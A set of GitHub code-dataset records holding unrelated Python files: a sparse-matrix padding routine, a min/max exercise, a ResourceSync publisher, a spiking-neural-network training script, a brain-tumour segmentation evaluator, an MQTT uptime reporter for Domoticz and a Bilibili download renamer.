codelet_groups[j],\n operation_to_coordinate)\n grp_mat[i, j] = cst\n grp_mat[j, i] = cst\n return grp_mat\n\n\ndef create_merged_group(merg_schedule, groups):\n new_grp = []\n for m in merg_schedule:\n merged_set = []\n for i in m:\n merged_set = list(set(merged_set + groups[i]))\n new_grp.append(merged_set)\n return new_grp\n\n\ndef merging(num_iter, init_grps, init_grps_idx, op_to_coo, psc_enabled, method):\n groups = init_grps if psc_enabled else init_grps_idx\n for i in range(num_iter):\n costs = BLAS_padding(groups, op_to_coo, psc_enabled)\n if method == METHOD.ILP:\n mrgs_sol, dim = padding_ilp_problem(costs)\n else:\n mrgs_sol, dim = padding_sorting_problem(costs)\n mrgs_schedule = list_to_groups(dim, mrgs_sol)\n groups = create_merged_group(mrgs_schedule, groups)\n groups = create_merged_group(mrgs_schedule, init_grps)\n return groups\n\n\ndef merging_sop(num_parts, init_grps, init_grps_idx, op_to_coo, method):\n groups = init_grps_idx\n groups_nnz = init_grps\n cur_groups = len(groups)\n while cur_groups > num_parts:\n costs = BLAS_padding(groups, op_to_coo, False)\n if method == METHOD.ILP:\n mrgs_sol, dim = padding_ilp_problem(costs)\n else:\n mrgs_sol, dim = padding_sorting_problem(costs)\n mrgs_schedule = list_to_groups(dim, mrgs_sol)\n groups = create_merged_group(mrgs_schedule, groups)\n groups_nnz = create_merged_group(mrgs_schedule, groups_nnz)\n cur_groups = len(groups)\n return groups_nnz\n\n\n\n\n\n\n\n\n","repo_name":"SpRegTiling/sparse-register-tiling","sub_path":"sbench/ilp_pad/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"23076115856","text":"import sys\r\n\r\ncounts = int(sys.stdin.readline())\r\nnumbers = list(map(int, sys.stdin.readline().rstrip().split()))\r\n# max_result=0\r\n# min_result=0\r\n# for i in range(len(numbers)):\r\n# if i == 0:\r\n# max_result = numbers[i]\r\n# else:\r\n# if i > max_result:\r\n# max_result = i\r\n# for j in range(len(numbers)):\r\n# if j == 0:\r\n# min_result = numbers[j]\r\n# else:\r\n# if numbers[j] < min_result:\r\n# min_result = numbers[j]\r\n\r\n\r\nmin_result = min(numbers)\r\nmax_result = max(numbers)\r\nprint(min_result, max_result)\r\n","repo_name":"violetassom/Baekjoon","sub_path":"백준/Bronze/10818. 최소, 최대/최소, 최대.py","file_name":"최소, 최대.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40804531191","text":"#! 
/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport sys\n# Enable dynamic imports\nsys.path.append(\".\")\n\nfrom argparse import ArgumentParser\nfrom syncdirector import SyncDirector\n\n# Publish rdf patch files as resource dumps.\n\n# Bundle up to max_files_compressed rdf patch files as successive definitely published resources;\n# bundle the remainder of rdf patch files as temporary bundled resources.\n\nparser = ArgumentParser()\n# parser arguments:\n# --source_dir: directory containing files to be synced\n# --sink_dir: directory where files will be published\n# --publish_url: public url pointing to sink dir\n# --builder_class: class to handle the publishing of resources\n# --max_files_compressed: the maximum number of resource files that should be compressed in one file\n# --write_separate_manifest: 'y' to write manifest included in published dump also in sink_dir as a separate file\n# --move_resources: 'y' to move definitely published resources from source_dir to sink_dir,\n# otherwise simply remove them from resource_dir.\nparser.add_argument('--source_dir', required=True)\nparser.add_argument('--sink_dir', required=True)\nparser.add_argument('--publish_url', required=True)\nparser.add_argument('--builder_class', default=\"zipsynchronizer.ZipSynchronizer\")\nparser.add_argument('--max_files_compressed', type=int, default=50000)\nparser.add_argument('--write_separate_manifest', default=\"y\")\nparser.add_argument('--move_resources', default=\"n\")\nargs = parser.parse_args()\n\nwrite_separate_manifest = args.write_separate_manifest == \"y\"\nmove_resources = args.move_resources == \"y\"\n\ndirector = SyncDirector(args.source_dir, args.sink_dir, args.publish_url, args.builder_class,\n args.max_files_compressed, write_separate_manifest, move_resources)\ndirector.synchronize()","repo_name":"CLARIAH/virtuoso-quad-log","sub_path":"resourcesync-generator/oai-rs/rsync.py","file_name":"rsync.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36642748938","text":"import torch\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nimport torch.nn.init\nimport os\nimport torch.nn as nn\nimport time\nimport matplotlib.pyplot as plt\nimport tonic.transforms as transforms\nimport tonic\nimport numpy as np\nimport snntorch as snn\nfrom snntorch import surrogate\nfrom snntorch import functional as SF\nfrom snntorch import spikeplot as splt\nfrom snntorch import utils\nimport torch.nn as nn\nimport os\nfrom torch.utils.data import DataLoader, random_split\nimport torch\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nsensor_size = tonic.datasets.NMNIST.sensor_size\n\n# Denoise removes isolated, one-off events\n# time_window\nframe_transform = transforms.ToFrame(sensor_size=sensor_size, time_window=1)\n\n\nframe_transform = transforms.Compose([transforms.Denoise(filter_time=10000),\n transforms.ToFrame(sensor_size=sensor_size,\n time_window=10000)\n ])\n\ntrainset = tonic.datasets.NMNIST(save_to='/home/hubo1024/PycharmProjects/snntorch/data/NMNIST', transform=frame_transform, train=True)\ntestset = tonic.datasets.NMNIST(save_to='./home/hubo1024/PycharmProjects/snntorch/data/NMNIST', transform=frame_transform, train=False)\n\n# 랜덤 시드 고정\ntorch.manual_seed(777)\n\n# GPU 사용 가능일 경우 랜덤 시드 고정\nif device == 'cuda':\n torch.cuda.manual_seed_all(777)\n\n#batch_size = 100\n\nbatch_size = 32\ndataset_size = len(trainset)\ntrain_size = int(dataset_size * 
0.9)\nvalidation_size = int(dataset_size * 0.1)\n\n\ntrainset, valset = random_split(trainset, [train_size, validation_size])\nprint(len(valset))\nprint(len(trainset))\ntrainloader = DataLoader(trainset, batch_size=batch_size, collate_fn=tonic.collation.PadTensors(), shuffle=True)\nvalloader = DataLoader(valset, batch_size=batch_size, collate_fn=tonic.collation.PadTensors(), shuffle=True)\ntestloader = DataLoader(testset, batch_size=batch_size, collate_fn=tonic.collation.PadTensors())\n\n\nspike_grad = surrogate.fast_sigmoid(slope=75)\nbeta = 0.5\n\nclass CNN(torch.nn.Module):\n\n def __init__(self):\n super(CNN, self).__init__()\n self.keep_prob = 0.5\n self.layer1 = torch.nn.Sequential(\n nn.Conv2d(2, 12, 5),\n nn.MaxPool2d(2),\n snn.Leaky(beta=beta, spike_grad=spike_grad, init_hidden=True))\n\n self.layer2 = torch.nn.Sequential(\n nn.Conv2d(12, 32, 5),\n nn.MaxPool2d(2),\n snn.Leaky(beta=beta, spike_grad=spike_grad, init_hidden=True))\n\n # L4 FC 4x4x128 inputs -> 625 outputs\n\n self.layer4 = torch.nn.Sequential(\n nn.Flatten(),\n nn.Linear(32 * 5 * 5, 10),\n snn.Leaky(beta=beta, spike_grad=spike_grad, init_hidden=True, output=True))\n # L5 Final FC 625 inputs -> 10 outputs\n\n def forward(self, data):\n spk_rec = []\n layer1_rec = []\n layer2_rec = []\n utils.reset(self.layer1) # resets hidden states for all LIF neurons in net\n utils.reset(self.layer2)\n utils.reset(self.layer4)\n\n for step in range(data.size(1)): # data.size(0) = number of time steps\n input_torch = data[:, step, :, :, :]\n input_torch = input_torch.cuda()\n #print(input_torch)\n out = self.layer1(input_torch)\n out1 = out\n\n out = self.layer2(out)\n out2 = out\n out, mem = self.layer4(out)\n\n spk_rec.append(out)\n\n layer1_rec.append(out1)\n layer2_rec.append(out2)\n\n return torch.stack(spk_rec), torch.stack(layer1_rec), torch.stack(layer2_rec)\n# CNN 모델 정의\n\n#os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = '1, 2, 3'\nmodel = CNN().to(device)\noptimizer = torch.optim.NAdam(model.parameters(), lr=0.005,betas=(0.9, 0.999))\nloss_fn = SF.mse_count_loss(correct_rate=0.8, incorrect_rate=0.2)\n#model = nn.DataParallel(model)\n\ntotal_batch = len(trainloader)\nprint('총 배치의 수 : {}'.format(total_batch))\nloss_fn = SF.mse_count_loss(correct_rate=0.8, incorrect_rate=0.2)\nnum_epochs = 15\nloss_hist = []\nacc_hist = []\nv_acc_hist = []\nt_spk_rec_sum = []\nstart = time.time()\nval_cnt = 0\nv_acc_sum= 0\navg_loss = 0\nindex = 0\n#################################################\n\n\n\nfor epoch in range(num_epochs):\n torch.save(model.state_dict(), '/home/hubo1024/PycharmProjects/snntorch/model_pt/Nadam_05loss-10000.pt')\n for i, (data, targets) in enumerate(iter(trainloader)):\n data = data.cuda()\n targets = targets.cuda()\n\n model.train()\n spk_rec, h1, h2 = model( data)\n #print(spk_rec.shape)\n loss_val = loss_fn(spk_rec, targets)\n avg_loss += loss_val.item()\n # Gradient calculation + weight update\n optimizer.zero_grad()\n\n loss_val.backward()\n optimizer.step()\n #print(spk_rec.shape)\n # Store loss history for future plotting\n loss_hist.append(loss_val.item())\n val_cnt = val_cnt+1\n\n if val_cnt == len(trainloader)/2-1:\n val_cnt=0\n torch.save(model.state_dict(), '/home/hubo1024/PycharmProjects/snntorch/model_pt/Nadam_05loss-10000.pt')\n for ii, (v_data, v_targets) in enumerate(iter(valloader)):\n v_data = v_data.to(device)\n v_targets = v_targets.to(device)\n\n v_spk_rec, h1, h2 = model(v_data)\n # print(t_spk_rec.shape)\n v_acc = SF.accuracy_rate(v_spk_rec, 
v_targets)\n if ii == 0:\n v_acc_sum = v_acc\n cnt = 1\n\n else:\n v_acc_sum += v_acc\n cnt += 1\n plt.plot(acc_hist)\n plt.plot(v_acc_hist)\n plt.legend(['train accuracy', 'validation accuracy'])\n plt.title(\"Train, Validation Accuracy-Nadam_05loss-10000\")\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Accuracy\")\n # plt.show()\n plt.savefig('Nadam_05loss-10000.png')\n plt.clf()\n v_acc_sum = v_acc_sum/cnt\n\n avg_loss = avg_loss / (len(trainloader) / 2)\n print('average loss while half epoch:', avg_loss)\n if avg_loss <= 0.5:\n index = 1\n break\n else:\n avg_loss = 0\n index = 0\n\n print('Nadam_05loss-10000')\n print(\"time :\", time.time() - start,\"sec\")\n print(f\"Epoch {epoch}, Iteration {i} \\nTrain Loss: {loss_val.item():.2f}\")\n\n acc = SF.accuracy_rate(spk_rec, targets)\n acc_hist.append(acc)\n v_acc_hist.append(v_acc_sum)\n print(f\"Train Accuracy: {acc * 100:.2f}%\")\n print(f\"Validation Accuracy: {v_acc_sum * 100:.2f}%\\n\")\n if index == 1:\n torch.save(model.state_dict(), '/home/hubo1024/PycharmProjects/snntorch/model_pt/Nadam_05loss-10000.pt')\n break\n if index == 1:\n break\n","repo_name":"Hyunho-Won/SNN_paper","sub_path":"train/manual_train.py","file_name":"manual_train.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"71838178484","text":"import os\r\nimport argparse\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.optim as optim\r\nfrom torchvision.transforms import transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom tqdm import tqdm\r\n\r\n\"\"\"\r\n=============================自己的包===========================\r\n\"\"\"\r\nfrom BraTS2021 import *\r\nfrom BraTS2018 import *\r\nfrom BraTS2019 import *\r\nfrom utils import *\r\n\r\nfrom networks.MyNet.MyNet import MyNet\r\nfrom networks.MyNet.baseline import Baseline\r\nfrom networks.MyNet.baselineMRF import BaselineMRF\r\nfrom networks.MyNet.baselineRSA import BaselineRSA\r\nfrom networks.DingYi.Ding_Yi import Yi_Ding\r\nfrom networks.Liuliangliang.Liuliangliang import Liangliang_Liu\r\nfrom networks.LuoZhengrong.LuoZhengrong import Zhengrong_Luo\r\nfrom networks.PeirisHimashi.unet import Unet\r\nfrom networks.PeirisHimashi.layers import get_norm_layer\r\nfrom networks.Henry.unet import Att_EquiUnet\r\nfrom networks.ChenChen.DMFNet import DMFNet\r\nfrom networks.Islam.attention_unet import UNet3D\r\n\r\nfrom draw_box import draw_box_bar\r\n\r\n\r\ndef val_loop(model, criterion, loader, device):\r\n model.eval()\r\n running_loss = 0\r\n dice1_val = 0\r\n dice2_val = 0\r\n dice3_val = 0\r\n sen_WT, sen_ET, sen_TC = 0, 0, 0\r\n spe_WT, spe_ET, spe_TC = 0, 0, 0\r\n ds_wt, ds_et, ds_tc = 0, 0, 0\r\n\r\n pbar = tqdm(loader, desc='Validation: ')\r\n with torch.no_grad():\r\n step = 0\r\n for images, masks in pbar:\r\n step += 1\r\n images, masks = images.to(device), masks.to(device)\r\n outputs = model(images)\r\n # outputs = torch.softmax(outputs,dim=1)\r\n\r\n loss = criterion(outputs, masks)\r\n dice1, dice2, dice3 = cal_dice(outputs, masks)\r\n\r\n running_loss += loss.item()\r\n dice1_val += dice1.item()\r\n dice2_val += dice2.item()\r\n dice3_val += dice3.item()\r\n\r\n # with open(f\"{MODEL_NAME}_et.txt\", 'a+') as f:\r\n # f.write(\"{:.3f}, \".format(dice1.item()))\r\n # if step % 20 == 0:\r\n # f.write('\\n')\r\n # with open(f\"{MODEL_NAME}_wt.txt\", 'a+') as f:\r\n # f.write(\"{:.3f}, \".format(dice3.item()))\r\n # if step % 20 == 0:\r\n # f.write('\\n')\r\n # with 
open(f\"{MODEL_NAME}_tc.txt\", 'a+') as f:\r\n # f.write(\"{:.3f}, \".format(dice2.item()))\r\n # if step % 20 == 0:\r\n # f.write('\\n')\r\n\r\n pbar.set_postfix(loss=f\"{loss:.3f}\", dice1=f'{dice1:.3f}', dice2=f\"{dice2:.3f}\", dice3=f\"{dice3:.3f}\")\r\n\r\n # oh_label = F.one_hot(masks, 4).permute(0, 4, 1, 2, 3).to(device)\r\n # oh_output = torch.sigmoid(outputs).to(device)\r\n oh_label = F.one_hot(masks, 4).permute(0, 4, 1, 2, 3).detach().cpu().numpy()\r\n oh_output = torch.argmax(outputs, dim=1).long()\r\n oh_output = F.one_hot(oh_output, 4).permute(0, 4, 1, 2, 3).detach().cpu().numpy()\r\n oh_output_h = torch.sigmoid(outputs).detach().cpu()\r\n\r\n sen_WT += sensitivity_WT(oh_output, oh_label)\r\n sen_ET += sensitivity_ET(oh_output, oh_label)\r\n sen_TC += sensitivity_TC(oh_output, oh_label)\r\n spe_WT += specificity_WT(oh_output, oh_label)\r\n spe_ET += specificity_ET(oh_output, oh_label)\r\n spe_TC += specificity_TC(oh_output, oh_label)\r\n # ds_wt += hausdorff_distance_WT(torch.from_numpy(oh_output), torch.from_numpy(oh_label))\r\n # ds_et += hausdorff_distance_ET(torch.from_numpy(oh_output), torch.from_numpy(oh_label))\r\n # ds_tc += hausdorff_distance_TC(torch.from_numpy(oh_output), torch.from_numpy(oh_label))\r\n ds_wt += hausdorff_distance_WT(oh_output_h, torch.from_numpy(oh_label))\r\n ds_et += hausdorff_distance_ET(oh_output_h, torch.from_numpy(oh_label))\r\n ds_tc += hausdorff_distance_TC(oh_output_h, torch.from_numpy(oh_label))\r\n\r\n sen_WT = sen_WT / len(loader)\r\n sen_ET = sen_ET / len(loader)\r\n sen_TC = sen_TC / len(loader)\r\n spe_WT = spe_WT / len(loader)\r\n spe_ET = spe_ET / len(loader)\r\n spe_TC = spe_TC / len(loader)\r\n ds_wt = ds_wt / len(loader)\r\n ds_et = ds_et / len(loader)\r\n ds_tc = ds_tc / len(loader)\r\n\r\n loss = running_loss / len(loader)\r\n dice1 = dice1_val / len(loader)\r\n dice2 = dice2_val / len(loader)\r\n dice3 = dice3_val / len(loader)\r\n return {'loss': loss, 'dice1': dice1, 'dice2': dice2, 'dice3': dice3,\r\n 'sen_WT': sen_WT, 'sen_ET': sen_ET, 'sen_TC': sen_TC,\r\n 'spe_WT': spe_WT, 'spe_ET': spe_ET, 'spe_TC': spe_TC,\r\n 'ds_wt': ds_wt, 'ds_et': ds_et, 'ds_tc': ds_tc}\r\n\r\n\r\ndef main(args):\r\n np.random.seed(args.seed)\r\n torch.manual_seed(args.seed) # 为CPU设置种子用于生成随机数,以使得结果是确定的\r\n torch.cuda.manual_seed_all(args.seed) # 为所有的GPU设置种子,以使得结果是确定的\r\n\r\n torch.backends.cudnn.deterministic = True\r\n torch.backends.cudnn.benchmark = True\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n # data info\r\n patch_size = (128, 128, 64)\r\n # train_dataset = BraTS2021(args.data_path, args.train_txt, transform=transforms.Compose([\r\n # RandomRotFlip(),\r\n # CenterCrop(patch_size),\r\n # GaussianNoise(p=0.1),\r\n # ToTensor()\r\n # ]))\r\n val_dataset = BraTS2021(args.data_path, args.valid_txt, transform=transforms.Compose([\r\n CenterCrop(patch_size),\r\n ToTensor()\r\n ]))\r\n # test_dataset = BraTS2021(args.data_path, args.test_txt, transform=transforms.Compose([\r\n # CenterCrop(patch_size),\r\n # ToTensor()\r\n # ]))\r\n data_path = \"../dataset/brats2019/data\"\r\n patch_size = (128, 128, 64)\r\n test_dataset = BraTS2019(data_path, transform=transforms.Compose([\r\n RandomRotFlip(),\r\n CenterCrop(patch_size),\r\n GaussianNoise(p=0.1),\r\n ToTensor()\r\n ]))\r\n # train_loader = DataLoader(dataset=train_dataset, batch_size=args.batch_size, num_workers=8, # num_worker=4\r\n # shuffle=True, pin_memory=True)\r\n val_loader = DataLoader(dataset=val_dataset, 
batch_size=args.batch_size, num_workers=8, shuffle=False,\r\n pin_memory=True)\r\n test_loader = DataLoader(dataset=test_dataset, batch_size=args.batch_size, num_workers=8, shuffle=False,\r\n pin_memory=True)\r\n\r\n\r\n\r\n print(\"using {} device.\".format(device))\r\n print(\"using {} images for validation, {} images for testing.\".format(len(val_dataset), len(test_dataset)))\r\n # img,label = train_dataset[0]\r\n\r\n # 1-坏疽(NT,necrotic tumor core),2-浮肿区域(ED,peritumoral edema),4-增强肿瘤区域(ET,enhancing tumor)\r\n # 评价指标:ET(label4),TC(label1+label4),WT(label1+label2+label4)\r\n print(f\"using {MODEL_NAME} for training\")\r\n if MODEL_NAME == 'MyNet':\r\n model = MyNet(in_channels=4, num_classes=4).to(device)\r\n elif MODEL_NAME == 'Yi_Ding':\r\n model = Yi_Ding(in_data=4, out_data=4).to(device)\r\n elif MODEL_NAME == 'Zhengrong_Luo':\r\n model = Zhengrong_Luo(in_data=4, out_data=4).to(device)\r\n elif MODEL_NAME == 'LiuLiangLiang':\r\n model = Liangliang_Liu(in_data=4, out_data=4).to(device)\r\n elif MODEL_NAME == 'PeirisHimashi':\r\n model = Unet(4, 4, width=32, norm_layer=get_norm_layer('inorm'), dropout=0).to(device)\r\n elif MODEL_NAME == 'TheophrasteHenry':\r\n model = Att_EquiUnet(4, 4, width=32, norm_layer=get_norm_layer('inorm'), dropout=0).to(device)\r\n elif MODEL_NAME == 'ChenChen':\r\n model = DMFNet(c=4, groups=16, norm='sync_bn', num_classes=4).to(device)\r\n elif MODEL_NAME == 'lslam':\r\n model = UNet3D(in_channels=4, out_channels=4, final_sigmoid=False).to(device)\r\n elif MODEL_NAME == 'baseline':\r\n model = Baseline(in_channels=4, num_classes=4).to(device)\r\n elif MODEL_NAME == 'baselineMRF':\r\n model = BaselineMRF(in_channels=4, num_classes=4).to(device)\r\n elif MODEL_NAME == 'baselineRSA':\r\n model = BaselineRSA(in_channels=4, num_classes=4).to(device)\r\n\r\n criterion = Loss(n_classes=4, weight=torch.tensor([0.25, 0.25, 0.25, 0.25])).to(device)\r\n\r\n # 加载训练模型\r\n if os.path.exists(args.weights):\r\n weight_dict = torch.load(args.weights, map_location=device)\r\n model.load_state_dict(weight_dict['model'])\r\n print('Successfully loading checkpoint.')\r\n\r\n # metrics2 = val_loop(model, criterion, val_loader, device)\r\n metrics3 = val_loop(model, criterion, test_loader, device)\r\n\r\n # print(\"Valid -- loss: {:.5f} ET: {:.5f} TC: {:.5f} WT: {:.5f}\".format(metrics2['loss'], metrics2['dice1'],\r\n # metrics2['dice2'], metrics2['dice3']))\r\n # print(\"Valid -- sen_WT: {:.5f} sen_ET: {:.5f} sen_TC: {:.5f}\".format(metrics2['sen_WT'], metrics2['sen_ET'],\r\n # metrics2['sen_TC']))\r\n # print(\"Valid -- spe_WT: {:.5f} spe_ET: {:.5f} spe_TC: {:.5f}\".format(metrics2['spe_WT'], metrics2['spe_ET'],\r\n # metrics2['spe_TC']))\r\n # print(\"Valid -- ds_wt: {:.3f} ds_et: {:.3f} ds_tc: {:.3f}\".format(metrics2['ds_wt'], metrics2['ds_et'],\r\n # metrics2['ds_tc']))\r\n\r\n\r\n print(\"Test -- loss: {:.5f} ET: {:.5f} TC: {:.5f} WT: {:.5f}\".format(metrics3['loss'], metrics3['dice1'],\r\n metrics3['dice2'], metrics3['dice3']))\r\n print(\"Test -- sen_WT: {:.5f} sen_ET: {:.5f} sen_TC: {:.5f}\".format(metrics3['sen_WT'], metrics3['sen_ET'],\r\n metrics3['sen_TC']))\r\n print(\"Test -- spe_WT: {:.5f} spe_ET: {:.5f} spe_TC: {:.5f}\".format(metrics3['spe_WT'], metrics3['spe_ET'],\r\n metrics3['spe_TC']))\r\n print(\"Test -- ds_wt: {:.3f} ds_et: {:.3f} ds_tc: {:.3f}\".format(metrics3['ds_wt'], metrics3['ds_et'],\r\n metrics3['ds_tc']))\r\n\r\n\r\nif __name__ == '__main__':\r\n MODEL_NAME = 'MyNet'\r\n # MODEL_NAME = 'PeirisHimashi'\r\n # MODEL_NAME = 'Yi_Ding'\r\n # MODEL_NAME 
= 'Zhengrong_Luo'\r\n # MODEL_NAME = 'LiuLiangLiang'\r\n # MODEL_NAME = 'TheophrasteHenry'\r\n # MODEL_NAME = 'ChenChen'\r\n # MODEL_NAME = 'lslam'\r\n # MODEL_NAME = 'baseline'\r\n # MODEL_NAME = 'baselineMRF'\r\n # MODEL_NAME = 'baselineRSA'\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--num_classes', type=int, default=4)\r\n parser.add_argument('--seed', type=int, default=21)\r\n parser.add_argument('--epochs', type=int, default=10)\r\n parser.add_argument('--warmup_epochs', type=int, default=5)\r\n parser.add_argument('--batch_size', type=int, default=1)\r\n parser.add_argument('--lr', type=float, default=1e-3)\r\n parser.add_argument('--min_lr', type=float, default=0.002)\r\n parser.add_argument('--data_path', type=str, default='../dataset/brats2021/data')\r\n # parser.add_argument('--val_data_path', type=str, default='../dataset/brats2020/val_data/data')\r\n parser.add_argument('--train_txt', type=str, default='../dataset/brats2021/train.txt')\r\n parser.add_argument('--valid_txt', type=str, default='../dataset/brats2021/valid.txt')\r\n parser.add_argument('--test_txt', type=str, default='../dataset/brats2021/test.txt')\r\n parser.add_argument('--train_log', type=str, default=f'results/{MODEL_NAME}/{MODEL_NAME}.txt')\r\n parser.add_argument('--weights', type=str, default=f'results/{MODEL_NAME}/{MODEL_NAME}.pth')\r\n parser.add_argument('--save_path', type=str, default=f'checkpoint/{MODEL_NAME}')\r\n args = parser.parse_args()\r\n\r\n main(args)\r\n","repo_name":"luohaohaoluo/MPEDANet-pytorch","sub_path":"TempCode/code_pytorch/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":12026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4501039011","text":"#!/usr/bin/python3\n\"\"\"sets virtual sensor domoticz-uptime\"\"\"\nimport json\nimport os\n\nimport paho.mqtt.client as mqtt\nfrom uptime import uptime\n\nIDX = 205\nMQTT_IP = os.environ[\"MQTT_IP\"]\n\n\ndef format_uptime(uptime_in_seconds):\n \"\"\"formats uptime seconds into days hours minutes\"\"\"\n (days, remainder) = divmod(uptime_in_seconds, 24 * 60 * 60)\n (hours, remainder) = divmod(remainder, 60 * 60)\n (minutes, remainder) = divmod(remainder, 60)\n\n return f\"{days}d {hours}h {minutes}m\"\n\n\ndef format_payload(svalue):\n \"\"\"formats mqtt payload\"\"\"\n data = {\"idx\": IDX, \"nvalue\": 0, \"svalue\": svalue}\n return json.dumps(data)\n\n\ndef send_payload(payload):\n \"\"\"send mqtt payload\"\"\"\n client = mqtt.Client(\"uptime\")\n client.connect(MQTT_IP)\n client.publish(\"domoticz/in\", payload)\n client.disconnect()\n\n\nsend_payload(format_payload(format_uptime(int(uptime()))))\n","repo_name":"mvanvuren/domoticz-scripts","sub_path":"python/uptime_domoticzpi.py","file_name":"uptime_domoticzpi.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12130387422","text":"# \nimport os, re\n\ndef stg_log(msg = \"test log\", level=\"info\", filename = \"./vc.log\", do_print = 1):\n \"\"\"\n msg: info message to be printed\n level: info or warning or error\n \"\"\"\n from datetime import datetime\n std_log_msg = f\"vc: {datetime.now().isoformat(timespec='seconds')}: [{level}]: {msg}\"\n if (do_print):\n print(std_log_msg)\n std_log_msg += \"\\n\"\n with open(filename, 'a') as fo:\n fo.write(std_log_msg)\n\ndef check_platform():\n \"\"\"\n str returned\n \"\"\"\n import platform\n return platform.system()\n\nclass 
videoExport(object):\n\n def __init__(self):\n self._tree = {\"basic_path\": \"/\", \"exp_list\": []}\n self._platform = check_platform()\n if self._platform == \"Windows\":\n self._slash = '\\\\'\n else:\n self._slash = '/'\n stg_log(f\"videoExport loaded in platform: {self._platform}\")\n \n def get_file_tree(self):\n from pathlib import PurePath\n local_file_path = os.getcwd()\n pHandle = PurePath(local_file_path)\n # Current path\n self._local_path = pHandle.parents[0]\n self._tree[\"basic_path\"] = str(self._local_path)\n # list all dirs\n self._fp_list = os.listdir(self._local_path)\n # fp_list_copy = self._fp_list\n # self._fpa_list = []\n # stg_log(self._fp_list)\n for every_fp in self._fp_list:\n if not (re.fullmatch(r'edited_(s_)?\\d{1,12}', every_fp)):\n continue\n if os.path.isdir(str(self._local_path) + self._slash + every_fp):\n self._tree[\"exp_list\"].append({\"exp_dir\": every_fp})\n # stg_log(self._tree)\n stg_log(\"Get file tree done\")\n\n def export_info(self, exp_file = \"infoList.csv\"):\n import json, csv\n export_csv_file = str(self._local_path) + self._slash + exp_file\n for every_video in self._tree[\"exp_list\"]:\n stg_log(f\"export info: {every_video}\")\n info_location = str(self._local_path) + self._slash + every_video[\"exp_dir\"] + self._slash + \"infoFiles\"\n raw_info_list = os.listdir(info_location)\n useable_info_list = []\n for every_info in raw_info_list:\n # episode number is shorter than 5 characters\n if re.fullmatch(r'entry.\\d{1,5}.json', every_info):\n useable_info_list.append(every_info)\n with open(info_location + self._slash + every_info, 'rb') as fi:\n # file_reads = fi.read()\n # print(file_reads)\n entry_file = json.load(fi)\n title = entry_file[\"title\"]\n create_time = entry_file[\"time_create_stamp\"]\n update_time = entry_file[\"time_update_stamp\"]\n avid = entry_file[\"avid\"]\n bvid = entry_file[\"bvid\"]\n if \"owner_id\" in entry_file:\n owner = entry_file[\"owner_id\"]\n else:\n owner = 0\n full_description = entry_file[\"page_data\"][\"download_subtitle\"]\n stg_log(f\"title: {title}, create_time: {create_time},\" +\n f\"update_time: {update_time}, avid: {avid}, bvid: {bvid},\" +\n f\"owner: {owner}, full_description: {full_description}\")\n with open(export_csv_file, \"a\", newline='') as fo:\n csv_writer = csv.writer(fo,delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow([avid, bvid, owner,\n create_time, update_time,\n title, full_description])\n stg_log(\"export info done\")\n\n def search_for_info(self, keyword=\"\"):\n pass\n\n # keep sequence\n def rename_video(self):\n import json\n for every_video in self._tree[\"exp_list\"]:\n stg_log(f\"rename video: {every_video}\")\n info_location = str(self._local_path) + self._slash + every_video[\"exp_dir\"] + self._slash + \"infoFiles\"\n raw_info_list = os.listdir(info_location)\n for every_info in raw_info_list:\n # episode number is shorter than 5 characters\n if re.fullmatch(r'entry.\\d{1,5}.json', every_info):\n file_name_split = every_info.split('.')\n episode_num = file_name_split[1]\n with open(info_location + self._slash + every_info, 'rb') as fi:\n entry_file = json.load(fi)\n full_description = entry_file[\"page_data\"][\"download_subtitle\"]\n basic_path = str(self._local_path) + self._slash + every_video[\"exp_dir\"]\n source_file_name = basic_path + self._slash + episode_num + \".mp4\"\n # tbd..\n rename_file_name = basic_path + self._slash + full_description + \".mp4\"\n # Check if video file for every episode exists\n 
stg_log(f\"{source_file_name} will be renamed with {rename_file_name}\")\n if os.path.exists(source_file_name):\n # What if the description contains a char that cannot be used in filename?\n os.rename(source_file_name, rename_file_name)\n stg_log(\"rename succeed\")\n else:\n stg_log(\"entry.json does not mark a video\", \"warning\")\n stg_log(\"rename video done\")\n\n def rename_folder(self):\n import json\n for every_video in self._tree[\"exp_list\"]:\n stg_log(f\"rename video: {every_video}\")\n info_location = str(self._local_path) + self._slash + every_video[\"exp_dir\"] + self._slash + \"infoFiles\"\n raw_info_list = os.listdir(info_location)\n for every_info in raw_info_list:\n # episode number is shorter than 5 characters\n if re.fullmatch(r'entry.\\d{1,5}.json', every_info):\n # file_name_split = every_info.split('.')\n # episode_num = file_name_split[1]\n with open(info_location + self._slash + every_info, 'rb') as fi:\n entry_file = json.load(fi)\n title = entry_file[\"title\"]\n # basic_path = str(self._local_path) + self._slash + every_video[\"exp_dir\"]\n source_folder_name = str(self._local_path) + self._slash + every_video[\"exp_dir\"]\n # tbd..\n rename_folder_name = str(self._local_path) + self._slash + title\n # Check if video file for every episode exists\n stg_log(f\"{source_folder_name} will be renamed with {rename_folder_name}\")\n if os.path.exists(source_folder_name):\n os.rename(source_folder_name, rename_folder_name)\n stg_log(\"rename succeed\")\n 